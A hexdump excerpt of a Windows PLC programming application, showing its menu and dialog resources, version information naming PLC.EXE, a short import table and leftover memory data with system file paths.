00074410  00 00 00 00 43 33 64 4c  00 00 00 00 43 33 64 00  |....C3dL....C3d.|
00074420  43 33 64 44 00 00 00 00  23 33 32 37 37 30 00 00  |C3dD....#32770..|
00074430  44 69 73 61 62 6c 65 54  68 72 65 61 64 4c 69 62  |DisableThreadLib|
00074440  72 61 72 79 43 61 6c 6c  73 00 00 00 4b 45 52 4e  |raryCalls...KERN|
00074450  45 4c 33 32 2e 44 4c 4c  00 00 00 00 00 00 00 00  |EL32.DLL........|
00074460  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
[....]
00076c60  05 80 06 80 07 80 08 80  0a 80 00 00 12 80 00 00  |................|
00076c70  13 80 00 00 14 80 00 00  15 80 00 00 40 e1 45 e1  |............@⚠E⚠|
00076c80  00 00 00 00 10 00 46 00  49 00 4c 00 45 00 28 00  |......F.I.L.E.(.|
00076c90  26 00 46 00 29 00 00 00  00 00 00 e1 4e 00 45 00  |&.F.)......⚠N.E.|
00076ca0  57 00 5b 00 26 00 4e 00  29 00 09 00 43 00 74 00  |W.[.&.N.)...C.t.|
00076cb0  72 00 6c 00 2b 00 4e 00  00 00 00 00 01 e1 4f 00  |r.l.+.N......⚠O.|
00076cc0  50 00 45 00 4e 00 28 00  26 00 4f 00 29 00 2e 00  |P.E.N.(.&.O.)...|
00076cd0  2e 00 2e 00 09 00 43 00  74 00 72 00 6c 00 2b 00  |......C.t.r.l.+.|
00076ce0  4f 00 00 00 00 00 03 e1  53 00 41 00 56 00 45 00  |O......⚠S.A.V.E.|
00076cf0  28 00 26 00 53 00 29 00  09 00 43 00 74 00 72 00  |(.&.S.)...C.t.r.|
00076d00  6c 00 2b 00 53 00 00 00  00 00 04 e1 53 00 41 00  |l.+.S......⚠S.A.|
00076d10  56 00 45 00 20 00 41 00  53 00 28 00 26 00 41 00  |V.E. .A.S.(.&.A.|
00076d20  29 00 2e 00 2e 00 2e 00  00 00 00 00 00 00 00 00  |)...............|
00076d30  00 00 00 00 00 00 01 00  10 e1 00 67 d1 8f 87 65  |.........⚠.g⚠..e|
00076d40  f6 4e 00 00 00 00 00 00  00 00 80 00 41 e1 45 00  |⚠N..........A⚠E.|
00076d50  58 00 49 00 54 00 28 00  26 00 58 00 29 00 00 00  |X.I.T.(.&.X.)...|
00076d60  10 00 45 00 44 00 49 00  54 00 28 00 26 00 45 00  |..E.D.I.T.(.&.E.|
00076d70  29 00 00 00 00 00 2b e1  55 00 4e 00 44 00 4f 00  |).....+⚠U.N.D.O.|
00076d80  28 00 26 00 55 00 29 00  09 00 43 00 74 00 72 00  |(.&.U.)...C.t.r.|
00076d90  6c 00 2b 00 5a 00 00 00  00 00 00 00 00 00 00 00  |l.+.Z...........|
00076da0  23 e1 43 00 55 00 54 00  28 00 26 00 54 00 29 00  |#⚠C.U.T.(.&.T.).|
00076db0  09 00 43 00 74 00 72 00  6c 00 2b 00 58 00 00 00  |..C.t.r.l.+.X...|
00076dc0  00 00 22 e1 43 00 4f 00  50 00 59 00 28 00 26 00  |.."⚠C.O.P.Y.(.&.|
00076dd0  43 00 29 00 09 00 43 00  74 00 72 00 6c 00 2b 00  |C.)...C.t.r.l.+.|
00076de0  43 00 00 00 00 00 25 e1  50 00 41 00 53 00 54 00  |C.....%⚠P.A.S.T.|
00076df0  45 00 28 00 26 00 50 00  29 00 09 00 43 00 74 00  |E.(.&.P.)...C.t.|
00076e00  72 00 6c 00 2b 00 56 00  00 00 00 00 03 80 48 00  |r.l.+.V.......H.|
00076e10  6f 00 72 00 20 00 4c 00  69 00 6e 00 65 00 09 00  |o.r. .L.i.n.e...|
00076e20  43 00 74 00 72 00 6c 00  2b 00 48 00 00 00 00 00  |C.t.r.l.+.H.....|
00076e30  04 80 56 00 65 00 72 00  20 00 4c 00 69 00 6e 00  |..V.e.r. .L.i.n.|
00076e40  65 00 09 00 43 00 74 00  72 00 6c 00 2b 00 49 00  |e...C.t.r.l.+.I.|
00076e50  00 00 00 00 05 80 4f 00  70 00 65 00 6e 00 20 00  |......O.p.e.n. .|
00076e60  70 00 6f 00 72 00 74 00  09 00 43 00 74 00 72 00  |p.o.r.t...C.t.r.|
00076e70  6c 00 2b 00 4f 00 20 00  00 00 00 00 06 80 43 00  |l.+.O. .......C.|
00076e80  6c 00 6f 00 73 00 65 00  20 00 50 00 6f 00 72 00  |l.o.s.e. .P.o.r.|
00076e90  74 00 09 00 43 00 74 00  72 00 6c 00 2b 00 4e 00  |t...C.t.r.l.+.N.|
00076ea0  20 00 00 00 00 00 07 80  4f 00 75 00 74 00 09 00  | .......O.u.t...|
00076eb0  43 00 74 00 72 00 6c 00  2b 00 59 00 00 00 00 00  |C.t.r.l.+.Y.....|
00076ec0  08 80 53 00 65 00 74 00  09 00 43 00 74 00 72 00  |..S.e.t...C.t.r.|
00076ed0  6c 00 2b 00 53 00 00 00  00 00 0a 80 52 00 65 00  |l.+.S.......R.e.|
00076ee0  73 00 65 00 74 00 09 00  43 00 74 00 72 00 6c 00  |s.e.t...C.t.r.l.|
00076ef0  2b 00 52 00 00 00 00 00  00 00 00 00 00 00 12 80  |+.R.............|
00076f00  44 00 65 00 6c 00 20 00  70 00 61 00 72 00 74 00  |D.e.l. .p.a.r.t.|
00076f10  09 00 44 00 45 00 4c 00  45 00 54 00 45 00 00 00  |..D.E.L.E.T.E...|
00076f20  00 00 13 80 44 00 65 00  6c 00 20 00 56 00 65 00  |....D.e.l. .V.e.|
00076f30  72 00 09 00 53 00 68 00  69 00 66 00 74 00 2b 00  |r...S.h.i.f.t.+.|
00076f40  44 00 45 00 4c 00 45 00  54 00 45 00 00 00 00 00  |D.E.L.E.T.E.....|
00076f50  14 80 44 00 65 00 6c 00  20 00 6c 00 69 00 6e 00  |..D.e.l. .l.i.n.|
00076f60  65 00 09 00 43 00 74 00  72 00 6c 00 2b 00 44 00  |e...C.t.r.l.+.D.|
00076f70  45 00 4c 00 45 00 54 00  45 00 00 00 80 00 15 80  |E.L.E.T.E.......|
00076f80  49 00 6e 00 73 00 65 00  72 00 74 00 20 00 4c 00  |I.n.s.e.r.t. .L.|
00076f90  69 00 6e 00 65 00 09 00  43 00 74 00 72 00 6c 00  |i.n.e...C.t.r.l.|
00076fa0  2b 00 49 00 6e 00 73 00  65 00 72 00 74 00 00 00  |+.I.n.s.e.r.t...|
00076fb0  10 00 56 00 49 00 45 00  57 00 28 00 26 00 56 00  |..V.I.E.W.(.&.V.|
00076fc0  29 00 00 00 80 00 00 e8  e5 5d 77 51 0f 68 28 00  |)......⚠⚠]wQ.h(.|
00076fd0  26 00 54 00 29 00 00 00  90 00 48 00 45 00 4c 00  |&.T.).....H.E.L.|
00076fe0  50 00 28 00 26 00 48 00  29 00 00 00 00 00 43 e1  |P.(.&.H.).....C⚠|
00076ff0  2e 5e a9 52 3b 4e 98 98  28 00 26 00 48 00 29 00  |.^⚠R;N..(.&.H.).|
00077000  00 00 00 00 00 00 00 00  80 00 40 e1 73 51 8e 4e  |..........@⚠sQ.N|
00077010  20 00 50 00 4c 00 43 00  28 00 26 00 41 00 29 00  | .P.L.C.(.&.A.).|
00077020  2e 00 2e 00 2e 00 00 00  09 00 4e 00 00 e1 00 00  |..........N..⚠..|
00077030  09 00 4f 00 01 e1 00 00  09 00 53 00 03 e1 00 00  |..O..⚠....S..⚠..|
00077040  09 00 50 00 07 e1 00 00  09 00 5a 00 2b e1 00 00  |..P..⚠....Z.+⚠..|
[....]
000771a0  82 00 80 62 2f 67 00 5f  d1 53 e8 90 00 00 00 00  |...b/g._⚠S⚠.....|
000771b0  c0 00 00 40 00 00 00 00  08 00 00 00 00 00 8f 01  |⚠..@............|
000771c0  1e 00 00 00 00 00 00 00  0a 00 53 00 79 00 73 00  |..........S.y.s.|
000771d0  74 00 65 00 6d 00 00 00  00 00 01 50 00 00 00 00  |t.e.m......P....|
000771e0  00 00 00 00 23 00 1e 00  e8 03 ff ff 80 00 4c 00  |....#...⚠.⚠⚠..L.|
000771f0  41 00 44 00 44 00 45 00  52 00 00 00 00 00 00 00  |A.D.D.E.R.......|
00077200  00 00 01 50 00 00 00 00  23 00 00 00 23 00 1e 00  |...P....#...#...|
00077210  f0 03 ff ff 80 00 49 00  4e 00 53 00 54 00 52 00  |⚠.⚠⚠..I.N.S.T.R.|
00077220  55 00 43 00 54 00 00 00  00 00 00 00 00 00 01 50  |U.C.T..........P|
00077230  00 00 00 00 46 00 00 00  23 00 1e 00 f1 03 ff ff  |....F...#...⚠.⚠⚠|
00077240  80 00 54 00 45 00 53 00  54 00 00 00 00 00 00 00  |..T.E.S.T.......|
00077250  00 00 01 50 00 00 00 00  69 00 00 00 23 00 1e 00  |...P....i...#...|
00077260  f2 03 ff ff 80 00 00 00  00 00 00 00 00 00 01 50  |⚠.⚠⚠...........P|
00077270  00 00 00 00 8c 00 00 00  23 00 1e 00 f3 03 ff ff  |........#...⚠.⚠⚠|
00077280  80 00 00 00 00 00 00 00  00 00 01 50 00 00 00 00  |...........P....|
00077290  af 00 00 00 23 00 1e 00  f4 03 ff ff 80 00 00 00  |⚠...#...⚠.⚠⚠....|
000772a0  00 00 00 00 00 00 01 50  00 00 00 00 d2 00 00 00  |.......P....⚠...|
000772b0  23 00 1e 00 f5 03 ff ff  80 00 00 00 00 00 00 00  |#...⚠.⚠⚠........|
000772c0  00 00 01 50 00 00 00 00  f5 00 00 00 23 00 1e 00  |...P....⚠...#...|
000772d0  f6 03 ff ff 80 00 45 00  58 00 49 00 54 00 00 00  |⚠.⚠⚠..E.X.I.T...|
000772e0  00 00 00 00 00 00 00 00  c0 00 c8 80 00 00 00 00  |........⚠.⚠.....|
000772f0  07 00 00 00 00 00 06 01  35 00 00 00 00 00 93 8f  |........5.......|
[....]
00077430  c0 00 c8 80 00 00 00 00  07 00 00 00 00 00 08 01  |⚠.⚠.............|
00077440  37 00 00 00 00 00 93 8f  65 51 07 63 e4 4e 00 00  |7.......eQ.c⚠N..|
00077450  0a 00 53 00 79 00 73 00  74 00 65 00 6d 00 00 00  |..S.y.s.t.e.m...|
00077460  01 00 01 50 00 00 00 00  d2 00 0f 00 32 00 0e 00  |...P....⚠...2...|
00077470  01 00 ff ff 80 00 6e 78  9a 5b 00 00 00 00 00 00  |..⚠⚠..nx.[......|
00077480  00 00 01 50 00 00 00 00  d2 00 1e 00 32 00 0e 00  |...P....⚠...2...|
00077490  02 00 ff ff 80 00 d6 53  88 6d 00 00 00 00 00 00  |..⚠⚠..⚠S.m......|
000774a0  00 00 02 50 00 00 00 00  0a 00 0f 00 b4 00 0a 00  |...P........⚠...|
[....]
00077570  ef 03 ff ff 81 00 00 00  00 00 00 00 80 00 81 58  |⚠.⚠⚠...........X|
00077580  00 00 00 00 a5 00 1e 00  28 00 0e 00 f1 03 ff ff  |....⚠...(...⚠.⚠⚠|
00077590  81 00 00 00 00 00 00 00  18 03 34 00 00 00 56 00  |..........4...V.|
000775a0  53 00 5f 00 56 00 45 00  52 00 53 00 49 00 4f 00  |S._.V.E.R.S.I.O.|
000775b0  4e 00 5f 00 49 00 4e 00  46 00 4f 00 00 00 00 00  |N._.I.N.F.O.....|
000775c0  bd 04 ef fe 00 00 01 00  00 00 01 00 01 00 00 00  |⚠.⚠⚠............|
000775d0  00 00 01 00 01 00 00 00  3f 00 00 00 00 00 00 00  |........?.......|
000775e0  04 00 00 00 01 00 00 00  00 00 00 00 00 00 00 00  |................|
000775f0  00 00 00 00 78 02 00 00  01 00 53 00 74 00 72 00  |....x.....S.t.r.|
00077600  69 00 6e 00 67 00 46 00  69 00 6c 00 65 00 49 00  |i.n.g.F.i.l.e.I.|
00077610  6e 00 66 00 6f 00 00 00  54 02 00 00 01 00 30 00  |n.f.o...T.....0.|
00077620  38 00 30 00 34 00 30 00  34 00 62 00 30 00 00 00  |8.0.4.0.4.b.0...|
00077630  18 00 00 00 01 00 43 00  6f 00 6d 00 6d 00 65 00  |......C.o.m.m.e.|
00077640  6e 00 74 00 73 00 00 00  20 00 00 00 01 00 43 00  |n.t.s... .....C.|
00077650  6f 00 6d 00 70 00 61 00  6e 00 79 00 4e 00 61 00  |o.m.p.a.n.y.N.a.|
00077660  6d 00 65 00 00 00 00 00  54 00 16 00 01 00 46 00  |m.e.....T.....F.|
00077670  69 00 6c 00 65 00 44 00  65 00 73 00 63 00 72 00  |i.l.e.D.e.s.c.r.|
00077680  69 00 70 00 74 00 69 00  6f 00 6e 00 00 00 00 00  |i.p.t.i.o.n.....|
00077690  50 00 4c 00 43 00 20 00  4d 00 69 00 63 00 72 00  |P.L.C. .M.i.c.r.|
000776a0  6f 00 73 00 6f 00 66 00  74 00 20 00 fa 57 40 78  |o.s.o.f.t. .⚠W@x|
000776b0  7b 7c 94 5e 28 75 0b 7a  8f 5e 00 00 36 00 0b 00  |{|.^(u.z.^..6...|
000776c0  01 00 46 00 69 00 6c 00  65 00 56 00 65 00 72 00  |..F.i.l.e.V.e.r.|
000776d0  73 00 69 00 6f 00 6e 00  00 00 00 00 31 00 2c 00  |s.i.o.n.....1.,.|
000776e0  20 00 30 00 2c 00 20 00  30 00 2c 00 20 00 31 00  | .0.,. .0.,. .1.|
000776f0  00 00 00 00 28 00 04 00  01 00 49 00 6e 00 74 00  |....(.....I.n.t.|
00077700  65 00 72 00 6e 00 61 00  6c 00 4e 00 61 00 6d 00  |e.r.n.a.l.N.a.m.|
00077710  65 00 00 00 50 00 4c 00  43 00 00 00 40 00 0e 00  |e...P.L.C...@...|
00077720  01 00 4c 00 65 00 67 00  61 00 6c 00 43 00 6f 00  |..L.e.g.a.l.C.o.|
00077730  70 00 79 00 72 00 69 00  67 00 68 00 74 00 00 00  |p.y.r.i.g.h.t...|
00077740  48 72 43 67 40 62 09 67  20 00 28 00 43 00 29 00  |HrCg@b.g .(.C.).|
00077750  20 00 32 00 30 00 30 00  34 00 00 00 28 00 00 00  | .2.0.0.4...(...|
00077760  01 00 4c 00 65 00 67 00  61 00 6c 00 54 00 72 00  |..L.e.g.a.l.T.r.|
00077770  61 00 64 00 65 00 6d 00  61 00 72 00 6b 00 73 00  |a.d.e.m.a.r.k.s.|
00077780  00 00 00 00 38 00 08 00  01 00 4f 00 72 00 69 00  |....8.....O.r.i.|
00077790  67 00 69 00 6e 00 61 00  6c 00 46 00 69 00 6c 00  |g.i.n.a.l.F.i.l.|
000777a0  65 00 6e 00 61 00 6d 00  65 00 00 00 50 00 4c 00  |e.n.a.m.e...P.L.|
000777b0  43 00 2e 00 45 00 58 00  45 00 00 00 20 00 00 00  |C...E.X.E... ...|
000777c0  01 00 50 00 72 00 69 00  76 00 61 00 74 00 65 00  |..P.r.i.v.a.t.e.|
000777d0  42 00 75 00 69 00 6c 00  64 00 00 00 32 00 09 00  |B.u.i.l.d...2...|
000777e0  01 00 50 00 72 00 6f 00  64 00 75 00 63 00 74 00  |..P.r.o.d.u.c.t.|
000777f0  4e 00 61 00 6d 00 65 00  00 00 00 00 50 00 4c 00  |N.a.m.e.....P.L.|
00077800  43 00 20 00 94 5e 28 75  0b 7a 8f 5e 00 00 00 00  |C. ..^(u.z.^....|
00077810  3a 00 0b 00 01 00 50 00  72 00 6f 00 64 00 75 00  |:.....P.r.o.d.u.|
00077820  63 00 74 00 56 00 65 00  72 00 73 00 69 00 6f 00  |c.t.V.e.r.s.i.o.|
00077830  6e 00 00 00 31 00 2c 00  20 00 30 00 2c 00 20 00  |n...1.,. .0.,. .|
00077840  30 00 2c 00 20 00 31 00  00 00 00 00 20 00 00 00  |0.,. .1..... ...|
00077850  01 00 53 00 70 00 65 00  63 00 69 00 61 00 6c 00  |..S.p.e.c.i.a.l.|
00077860  42 00 75 00 69 00 6c 00  64 00 00 00 44 00 00 00  |B.u.i.l.d...D...|
00077870  01 00 56 00 61 00 72 00  46 00 69 00 6c 00 65 00  |..V.a.r.F.i.l.e.|
00077880  49 00 6e 00 66 00 6f 00  00 00 00 00 24 00 04 00  |I.n.f.o.....$...|
00077890  00 00 54 00 72 00 61 00  6e 00 73 00 6c 00 61 00  |..T.r.a.n.s.l.a.|
000778a0  74 00 69 00 6f 00 6e 00  00 00 00 00 04 08 b0 04  |t.i.o.n.......⚠.|
000778b0  02 00 02 00 28 00 00 00  20 00 00 00 40 00 00 00  |....(... ...@...|
000778c0  01 00 01 00 00 00 00 00  00 01 00 00 00 00 00 00  |................|
[....]
00078090  77 77 77 77 77 88 77 77  77 77 77 77 88 77 77 77  |wwwww.wwwwww.www|
000780a0  77 77 77 88 77 77 77 77  77 77 88 aa 00 00 00 00  |www.wwwwww.⚠....|
000780b0  c4 00 c8 80 00 00 00 00  05 00 09 00 1a 00 b7 00  |⚠.⚠...........⚠.|
000780c0  46 00 00 00 00 00 b0 65  fa 5e 00 00 08 00 4d 00  |F.....⚠e⚠^....M.|
000780d0  53 00 20 00 53 00 68 00  65 00 6c 00 6c 00 20 00  |S. .S.h.e.l.l. .|
000780e0  44 00 6c 00 67 00 00 00  00 00 00 50 00 00 00 00  |D.l.g......P....|
000780f0  06 00 05 00 7b 00 08 00  ff ff ff ff 82 00 b0 65  |....{...⚠⚠⚠⚠..⚠e|
00078100  fa 5e 28 00 26 00 4e 00  29 00 00 00 00 00 00 00  |⚠^(.&.N.).......|
[....]
00078710  01 00 01 00 b4 00 00 00  07 00 00 00 00 00 00 00  |....⚠...........|
00078720  c4 00 c0 80 00 00 00 00  07 00 06 00 12 00 85 00  |⚠.⚠.............|
00078730  5f 00 00 00 00 00 00 00  08 00 4d 00 53 00 20 00  |_.........M.S. .|
00078740  53 00 68 00 65 00 6c 00  6c 00 20 00 44 00 6c 00  |S.h.e.l.l. .D.l.|
00078750  67 00 00 00 01 00 02 50  00 00 00 00 00 00 09 00  |g......P........|
00078760  85 00 08 00 ff ff ff ff  82 00 53 62 70 53 00 00  |....⚠⚠⚠⚠..SbpS..|
00078770  00 00 00 00 01 00 02 50  00 00 00 00 00 00 13 00  |.......P........|
[....]
00078960  26 00 43 00 29 00 00 00  00 00 00 00 00 00 00 00  |&.C.)...........|
00078970  03 00 22 00 02 e3 00 00  03 00 21 00 03 e3 00 00  |.."..⚠....!..⚠..|
00078980  83 00 1b 00 00 e3 00 00  24 00 50 00 4c 00 43 00  |.....⚠..$.P.L.C.|
00078990  0a 00 0a 00 50 00 4c 00  43 00 0a 00 0a 00 0a 00  |....P.L.C.......|
000789a0  50 00 4c 00 43 00 2e 00  44 00 6f 00 63 00 75 00  |P.L.C...D.o.c.u.|
000789b0  6d 00 65 00 6e 00 74 00  0a 00 50 00 4c 00 43 00  |m.e.n.t...P.L.C.|
000789c0  20 00 44 00 6f 00 63 00  75 00 6d 00 65 00 6e 00  | .D.o.c.u.m.e.n.|
000789d0  74 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |t...............|
000789e0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
000789f0  03 00 50 00 4c 00 43 00  0a 00 82 59 00 97 2e 5e  |..P.L.C....Y...^|
00078a00  a9 52 0c ff f7 8b 09 63  46 00 31 00 2e 95 0c 00  |⚠R.⚠⚠..cF.1.....|
00078a10  09 90 9a 5b 00 4e 2a 4e  81 89 97 5f 30 52 2e 5e  |...[.N*N..._0R.^|
00078a20  a9 52 84 76 f9 5b 61 8c  00 00 00 00 00 00 00 00  |⚠R.v⚠[a.........|
[....]
0007e830  36 00 00 00 00 00 00 01  00 00 00 00 00 78 00 00  |6............x..|
0007e840  00 c0 60 01 00 84 00 00  00 00 00 00 00 00 00 00  |.⚠`.............|
0007e850  00 06 00 44 00 56 00 43  00 4c 00 41 00 4c 00 0b  |...D.V.C.L.A.L..|
0007e860  00 50 00 41 00 43 00 4b  00 41 00 47 00 45 00 49  |.P.A.C.K.A.G.E.I|
0007e870  00 4e 00 46 00 4f 00 00  00 00 00 00 00 00 00 00  |.N.F.O..........|
0007e880  00 00 00 00 00 40 91 01  00 14 91 01 00 00 00 00  |.....@..........|
0007e890  00 00 00 00 00 00 00 00  00 4d 91 01 00 28 91 01  |.........M...(..|
0007e8a0  00 00 00 00 00 00 00 00  00 00 00 00 00 5a 91 01  |.............Z..|
0007e8b0  00 30 91 01 00 00 00 00  00 00 00 00 00 00 00 00  |.0..............|
0007e8c0  00 66 91 01 00 38 91 01  00 00 00 00 00 00 00 00  |.f...8..........|
0007e8d0  00 00 00 00 00 00 00 00  00 00 00 00 00 70 91 01  |.............p..|
0007e8e0  00 7e 91 01 00 8e 91 01  00 9e 91 01 00 00 00 00  |.~..............|
0007e8f0  00 ac 91 01 00 00 00 00  00 ba 91 01 00 00 00 00  |.⚠.......⚠......|
0007e900  00 ca 91 01 00 00 00 00  00 4b 45 52 4e 45 4c 33  |.⚠.......KERNEL3|
0007e910  32 2e 44 4c 4c 00 61 64  76 61 70 69 33 32 2e 64  |2.DLL.advapi32.d|
0007e920  6c 6c 00 73 68 65 6c 6c  33 32 2e 64 6c 6c 00 75  |ll.shell32.dll.u|
0007e930  73 65 72 33 32 2e 64 6c  6c 00 00 4c 6f 61 64 4c  |ser32.dll..LoadL|
0007e940  69 62 72 61 72 79 41 00  00 47 65 74 50 72 6f 63  |ibraryA..GetProc|
0007e950  41 64 64 72 65 73 73 00  00 56 69 72 74 75 61 6c  |Address..Virtual|
0007e960  50 72 6f 74 65 63 74 00  00 45 78 69 74 50 72 6f  |Protect..ExitPro|
0007e970  63 65 73 73 00 00 00 52  65 67 43 6c 6f 73 65 4b  |cess...RegCloseK|
0007e980  65 79 00 00 00 53 68 65  6c 6c 45 78 65 63 75 74  |ey...ShellExecut|
0007e990  65 41 00 00 00 53 65 74  54 69 6d 65 72 00 00 00  |eA...SetTimer...|
0007e9a0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
0007f860  00 00 00 00 00 00 00 00  00 00 00 00 00 00 06 00  |................|
0007f870  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
0007fa10  00 00 88 de 12 00 45 00  00 00 70 39 f8 77 00 00  |...⚠..E...p9⚠w..|
0007fa20  13 00 78 13 13 00 45 00  00 00 d8 21 13 00 60 de  |..x...E...⚠!..`⚠|
[....]
0007fc00  12 00 12 02 00 00 00 00  00 00 00 00 00 00 00 00  |................|
0007fc10  00 00 00 00 00 00 00 00  00 00 02 00 00 00 43 00  |..............C.|
0007fc20  3a 00 5c 00 57 00 49 00  4e 00 4e 00 54 00 5c 00  |:.\.W.I.N.N.T.\.|
0007fc30  53 00 79 00 73 00 74 00  65 00 6d 00 33 00 32 00  |S.y.s.t.e.m.3.2.|
0007fc40  5c 00 49 00 4d 00 4d 00  33 00 32 00 2e 00 44 00  |\.I.M.M.3.2...D.|
0007fc50  4c 00 4c 00 00 00 00 00  00 00 00 00 00 00 00 00  |L.L.............|
0007fc60  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
[....]
0007ff30  12 00 b0 50 13 00 66 80  f8 77 32 e4 12 00 d4 50  |..⚠P..f.⚠w2⚠..⚠P|
0007ff40  13 00 86 50 13 00 00 00  00 00 34 e9 12 00 00 00  |...P......4⚠....|
0007ff50  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
0007ffb0  00 00 00 00 00 00 00 00  00 00 43 00 3a 00 5c 00  |..........C.:.\.|
0007ffc0  57 00 49 00 4e 00 4e 00  54 00 5c 00 53 00 79 00  |W.I.N.N.T.\.S.y.|
0007ffd0  73 00 74 00 65 00 6d 00  33 00 32 00 5c 00 49 00  |s.t.e.m.3.2.\.I.|
0007ffe0  4d 00 4d 00 33 00 32 00  2e 00 44 00 4c 00 4c 00  |M.M.3.2...D.L.L.|
0007fff0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
[....]
00080220  f8 77 00 00 00 00 90 ed  12 00 10 51 13 00 40 06  |⚠w.....⚠...Q..@.|
00080230  13 00 00 00 00 00 00 00  00 00 43 00 3a 00 5c 00  |..........C.:.\.|
00080240  57 00 49 00 4e 00 4e 00  54 00 5c 00 53 00 79 00  |W.I.N.N.T.\.S.y.|
00080250  73 00 74 00 65 00 6d 00  33 00 32 00 5c 00 49 00  |s.t.e.m.3.2.\.I.|
00080260  4d 00 4d 00 33 00 32 00  2e 00 44 00 4c 00 4c 00  |M.M.3.2...D.L.L.|
00080270  00 00 27 b2 fc 77 ec e6  12 00 45 00 00 00 70 39  |..'⚠⚠w⚠⚠..E...p9|
00080280  f8 77 00 00 13 00 78 13  13 00 45 00 00 00 d8 21  |⚠w....x...E...⚠!|
[....]
00080640  12 00 12 02 00 00 00 00  00 00 00 00 00 00 40 f0  |..............@⚠|
00080650  fc 77 e3 6b f8 77 18 ec  fd 7f 02 00 00 00 43 00  |⚠w⚠k⚠w.⚠⚠.....C.|
00080660  3a 00 5c 00 57 00 49 00  4e 00 4e 00 54 00 5c 00  |:.\.W.I.N.N.T.\.|
00080670  53 00 79 00 73 00 74 00  65 00 6d 00 33 00 32 00  |S.y.s.t.e.m.3.2.|
00080680  5c 00 49 00 4d 00 4d 00  33 00 32 00 2e 00 44 00  |\.I.M.M.3.2...D.|
00080690  4c 00 4c 00 00 00 00 00  00 00 00 00 00 00 00 00  |L.L.............|
000806a0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
[....]
000808a0  38 00 bc f0 12 00 00 00  00 00 ea b2 e0 77 20 f0  |8.⚠⚠......⚠⚠⚠w ⚠|
000808b0  12 00 00 00 00 80 c8 ef  12 00 00 00 00 00 b1 23  |......⚠⚠......⚠#|
000808c0  f4 77 00 e0 fd 7f 5c 00  52 00 65 00 67 00 69 00  |⚠w.⚠⚠.\.R.e.g.i.|
000808d0  73 00 74 00 72 00 79 00  5c 00 4d 00 61 00 63 00  |s.t.r.y.\.M.a.c.|
000808e0  68 00 69 00 6e 00 65 00  5c 00 53 00 79 00 73 00  |h.i.n.e.\.S.y.s.|
000808f0  74 00 65 00 6d 00 5c 00  43 00 75 00 72 00 63 b2  |t.e.m.\.C.u.r.c⚠|
00080900  f8 77 18 00 00 00 00 00  00 00 00 00 00 00 00 00  |⚠w..............|
00080910  00 00 74 ed 12 00 28 00  09 00 00 00 00 00 00 00  |..t⚠..(.........|
[....]
00080eb0  12 00 c4 c8 e7 77 00 00  9d 00 01 00 00 00 91 b6  |..⚠⚠⚠w.........⚠|
00080ec0  fc 77 00 f0 fd 7f 00 00  00 00 00 e0 fd 7f 00 e0  |⚠w.⚠⚠......⚠⚠..⚠|
00080ed0  fd 7f 72 00 6f 00 73 00  6f 00 66 00 74 00 5c 00  |⚠.r.o.s.o.f.t.\.|
00080ee0  57 00 69 00 6e 00 64 00  6f 00 00 e0 fd 7f 20 00  |W.i.n.d.o..⚠⚠. .|
00080ef0  4e 00 00 10 00 00 a4 f3  12 00 46 05 48 05 60 92  |N.....⚠⚠..F.H.`.|
00080f00  13 00 60 00 62 00 00 ec  fd 7f 00 00 00 00 00 00  |..`.b..⚠⚠.......|
00080f10  00 00 00 00 00 00 00 00  02 00 b0 12 e7 77 32 00  |..........⚠.⚠w2.|
00080f20  34 00 c8 1f 13 00 00 00  00 00 00 00 00 00 00 00  |4.⚠.............|
00080f30  9d 00 1e 00 20 00 a4 0a  02 00 00 10 00 00 43 00  |.... .⚠.......C.|
00080f40  3a 00 5c 00 57 00 49 00  4e 00 4e 00 54 00 5c 00  |:.\.W.I.N.N.T.\.|
00080f50  53 00 79 00 73 00 74 00  65 00 6d 00 33 00 32 00  |S.y.s.t.e.m.3.2.|
00080f60  5c 00 63 00 6d 00 64 00  2e 00 65 00 78 00 65 00  |\.c.m.d...e.x.e.|
00080f70  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
000810c0  00 00 00 00 00 00 00 00  00 00 3c f5 12 00 00 00  |..........<⚠....|
000810d0  00 00 e5 38 f8 77 00 00  13 00 c0 1f 13 00 00 00  |..⚠8⚠w....⚠.....|
[....]
00081220  48 00 48 00 48 00 48 00  48 00 48 00 00 00 20 01  |H.H.H.H.H.H... .|
00081230  02 03 04 05 06 07 08 09  0a 0b 0c 0d 0e 0f 10 11  |................|
00081240  12 13 14 15 16 17 00 e0  fd 7f 00 e0 fd 7f 20 21  |.......⚠⚠..⚠⚠. !|
00081250  22 23 24 25 26 27 28 29  2a 2b 2c 2d 2e 2f 30 31  |"#$%&'()*+,-./01|
00081260  32 33 34 35 36 37 38 39  3a 3b 3c 3d 3e 3f 40 41  |23456789:;<=>?@A|
00081270  42 43 44 45 46 47 48 49  4a 4b 4c 4d 4e 4f 50 51  |BCDEFGHIJKLMNOPQ|
00081280  52 53 54 55 56 57 58 59  5a 5b 5c 5d 5e 5f 00 00  |RSTUVWXYZ[\]^_..|
00081290  00 00 01 00 00 00 04 f7  12 00 18 69 f8 77 00 00  |.......⚠...i⚠w..|
000812a0  00 00 55 63 f8 77 fc f6  12 00 1a ec fd 7f 32 00  |..Uc⚠w⚠⚠...⚠⚠.2.|
[....]
00081370  f8 77 ff ff ff ff 68 fa  12 00 1a 02 00 00 08 00  |⚠w⚠⚠⚠⚠h⚠........|
00081380  00 00 68 fa 12 00 7d 3d  f8 77 70 f1 fc 77 ce b1  |..h⚠..}=⚠wp⚠⚠w⚠⚠|
00081390  f8 77 a6 b1 f8 77 00 ec  fd 7f 00 00 00 00 5c fb  |⚠w⚠⚠⚠w.⚠⚠.....\⚠|
000813a0  12 00 00 00 00 00 78 01  9c 00 bd 01 00 00 50 b6  |......x...⚠...P⚠|
000813b0  fc 77 02 00 00 00 45 00  3a 00 5c 00 65 00 5c 00  |⚠w....E.:.\.e.\.|
000813c0  7f 89 e8 95 50 5b 38 00  30 00 32 00 63 00 5c 00  |..⚠.P[8.0.2.c.\.|
